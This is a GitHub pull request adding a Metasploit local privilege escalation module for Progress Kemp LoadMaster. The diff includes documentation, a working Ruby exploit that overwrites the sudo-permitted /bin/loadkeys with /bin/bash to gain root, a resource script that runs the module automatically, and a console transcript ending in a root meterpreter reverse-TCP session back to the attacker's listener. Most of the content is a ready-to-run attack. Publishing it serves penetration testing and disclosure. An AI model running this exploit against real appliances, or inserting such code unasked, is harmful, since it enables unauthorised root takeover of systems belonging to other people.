Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Kemp Progress Loadmaster sudo abuse priv esc #19100

Merged
merged 5 commits into from
May 10, 2024
Merged

Add Kemp Progress Loadmaster sudo abuse priv esc #19100

Show file tree
Hide file tree
Changes from 2 commits
Commits
Show all changes
5 commits
Select commit Hold shift + click to select a range
d949715
Add documentation and fix some debug prints
bwatters-r7 Apr 17, 2024
742326a
Actually add script contents
bwatters-r7 Apr 17, 2024
b044bca
Add command payloads and checks for overwritten files
bwatters-r7 May 3, 2024
948b18b
Add a check to the file delete
bwatters-r7 May 9, 2024
b28e263
Update debug statements and add protection against bad die name
bwatters-r7 May 10, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
101 changes: 101 additions & 0 deletions ...ation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,101 @@
## Vulnerable Application
Progress Kemp LoadMaster up to at least 7.2.59.2.22338. The vendor is aware of this "feature," but
has chosen not to change the behavior. It was originally paired with CVE-2024-1212, but as this
privilege escalation was not patched when CVE-2024-1212 was, we split it into its own module.
This exploit/feature allows the default `bal` user to run several binaries with the `sudo` prefix
that will elevate without prompting for a password. As the configuration is based on filename and
the `bal` user has write permissions to these files, the `bal` user can simply write over the existing
binary with one of their choosing, then prefix it with `sudo` and launch the binary with `root`
privileges.
This module defaults to overwrite `/bin/loadkeys` with `/bin/bash`, though other binaries would work,
too.

For more details on the vulnerability:
https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/

https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212

A trial VM which the exploit should work against out of the box can be downloaded from:
https://sso.kemptechnologies.com/register/kemp/vlm

The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.
https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw

## Verification Steps
1. Install the application
1. Start msfconsole
1. Gain a session on a Progress Kemp Loadmaster target as the `bal` user
1. Do: `use exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024`
1. Do: `set SESSION <session>`
1. Do: `set LHOST <your host IP>`
1. Do: `run`
1. You should get a shell as the `root` user.

## Scenarios

### LoadMaster 7.2.59.0.22007

```msf
msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options

Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):

Name Current Setting Required Description
---- --------------- -------- -----------
BINARY_RENAME /tmp/tEYych yes The temporary name to use to store the TARGET_BINARY.
SESSION 1 yes The session to run this module on
TARGET_BINARY /bin/loadkeys yes The path for a binary file that has permission to auto-elevate.
TEMP_PAYLOAD /tmp/DKFuC yes The temporary name to use to store the payload.


Payload options (linux/x64/meterpreter_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux bal @ 10.5.134.141 10.5.135.201:4444 -> 10.5.134.141:28848 (10.5.134.141)

msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run

[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found 3 indicators this is a KEMP product
[!] The service is running, but could not be validated.
[*] Delete /tmp/tEYych
[*] Saving payload as /tmp/DKFuC
[*] Moving /bin/loadkeys to /tmp/tEYych
[*] Moving /bin/bash to /bin/loadkeys
[*] Launching payload
[+] Deleted /tmp/DKFuC
[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.134.141:28854) at 2024-04-17 13:37:14 -0500

meterpreter > sysinfo
Computer : 10.5.134.141
OS : SuSE 7.2 (Linux 4.14.137)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
```
101 changes: 101 additions & 0 deletions modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,101 @@
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::File

prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Kemp LoadMaster Local sudo privilege escalation',
'Description' => %q{
This module abuses a feature of the sudo command on Progress Kemp
LoadMaster. Certain binary files are allowed to automatically elevate
with the sudo command. This is based off of the file name. Some files
have this permission are not write-protected from the default 'bal' user.
As such, if the file is overwritten with an arbitrary file, it will still
auto-elevate. This module overwrites the /bin/loadkeys file with another
executable.
},
'Author' => [
'Dave Yesland with Rhino Security Labs',
'bwatters-r7' # module,
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],
['URL', 'https://kemptechnologies.com/kemp-load-balancers']
],
'DisclosureDate' => '2024-03-19',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
'Reliability' => [ REPEATABLE_SESSION ]
},
'SessionTypes' => ['shell', 'meterpreter'],
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [['Automatic', {}]],
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
}
)
)
register_options([
OptString.new('TARGET_BINARY', [true, 'The path for a binary file that has permission to auto-elevate.', '/bin/loadkeys']),
OptString.new('BINARY_RENAME', [true, 'The temporary name to use to store the TARGET_BINARY.', '/tmp/' + Rex::Text.rand_text_alpha(5..9) ]),
OptString.new('TEMP_PAYLOAD', [true, 'The temporary name to use to store the payload.', '/tmp/' + Rex::Text.rand_text_alpha(5..9) ]),
])
end

def check
score = 0
score += 1 if read_file('/usr/wui/index.js').include?('KEMP')
score += 1 if read_file('/etc/motd').include?('Kemp LoadMaster')
score += 1 if exists?('/usr/wui/eula.kemp.html')
vprint_status("Found #{score} indicators this is a KEMP product")
return CheckCode::Detected if score > 0

return CheckCode::Safe
end

def exploit
vprint_status("Delete #{datastore['BINARY_RENAME']}")
if exists?(datastore['BINARY_RENAME'])
fail_with(Msf::Module::Failure::BadConfig, "#{datastore['BINARY_RENAME']} exists on host; chose another name.")
end
if exists?(datastore['TEMP_PAYLOAD'])
fail_with(Msf::Module::Failure::BadConfig, "#{datastore['TEMP_PAYLOAD']} exists on host; chose another name.")
end

begin
vprint_status("Saving payload as #{datastore['TEMP_PAYLOAD']}")
write_file(datastore['TEMP_PAYLOAD'], generate_payload_exe)
chmod(datastore['TEMP_PAYLOAD'])
register_file_for_cleanup(datastore['TEMP_PAYLOAD'])

vprint_status("Moving #{datastore['TARGET_BINARY']} to #{datastore['BINARY_RENAME']}")
cmd_exec("sudo /bin/cp #{datastore['TARGET_BINARY']} #{datastore['BINARY_RENAME']}")

vprint_status("Moving /bin/bash to #{datastore['TARGET_BINARY']}")
cmd_exec("sudo /bin/cp /bin/bash #{datastore['TARGET_BINARY']}")

vprint_status('Launching payload')
cmd_exec("sudo #{datastore['TARGET_BINARY']} -c #{datastore['TEMP_PAYLOAD']}")
bwatters-r7 marked this conversation as resolved.
Show resolved Hide resolved
bwatters-r7 marked this conversation as resolved.
Show resolved Hide resolved
ensure
if exists?(datastore['BINARY_RENAME'])
cmd_exec("sudo /bin/cp #{datastore['BINARY_RENAME']} #{datastore['TARGET_BINARY']}")
cmd_exec("sudo /bin/rm #{datastore['BINARY_RENAME']}")
bwatters-r7 marked this conversation as resolved.
Show resolved Hide resolved
end
end
end
end
8 changes: 8 additions & 0 deletions scripts/resource/run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,8 @@
<ruby>
print_status("Running Progress Kemp Loadmaster sudo Privilege Escalation")
run_single("use modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024")
run_single("set session -1")
session_lhost = framework.sessions[framework.sessions.keys.last].tunnel_local.split(':')[0..-2].join(':')
run_single("set lhost #{session_lhost}")
run_single("run")
</ruby>